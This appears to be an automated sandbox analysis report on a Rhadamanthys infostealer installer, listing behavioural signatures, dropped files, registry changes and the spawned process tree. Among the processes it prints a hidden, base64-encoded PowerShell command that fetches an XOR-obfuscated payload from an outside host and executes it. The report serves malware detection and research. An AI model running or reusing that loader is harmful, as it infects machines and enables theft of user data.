Analysis Overview
SHA256
6ac07ce849ad258cf9b47ca9767badc6ee867962cdcbe470cbe0d02ddb7437e8
Threat Level: Known bad
The file setup.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Program crash
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-09 17:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-09 17:17
Reported
2024-02-09 17:47
Platform
win11-20231215-en
Max time kernel
939s
Max time network
1168s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3940 created 2824 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3164 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIAEEF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF40.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICC6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD6AC3EC2F0BB8290.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File created | C:\Windows\Installer\e57acf9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAE22.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{32889C47-8C9B-4281-A3AD-9D1BCBCC1C09} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57acfd.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB03D393F9EA60AD8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57acf9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE05CB3B5DCC967EF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB6A9AC84057EB145.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAECF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF20.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID25B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133519726848393191" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B679B08DEE859E7BF68230C84A800740 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707258448 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 74F892A0B540A5F6AEE19F1BF7837B4F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF9C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF99.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF9A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF9B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd1f0b9758,0x7ffd1f0b9768,0x7ffd1f0b9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1356 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe
"C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAGcAbwBvAGQAMgAtAGwAZQBkAC4AYwBvAG0ALwBkAGEAcgBrADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBkACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAZwAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgBzACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3940 -ip 3940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2388
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c8b9758,0x7ffd0c8b9768,0x7ffd0c8b9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3176 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4624 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4860 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5576 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5688 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3316 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
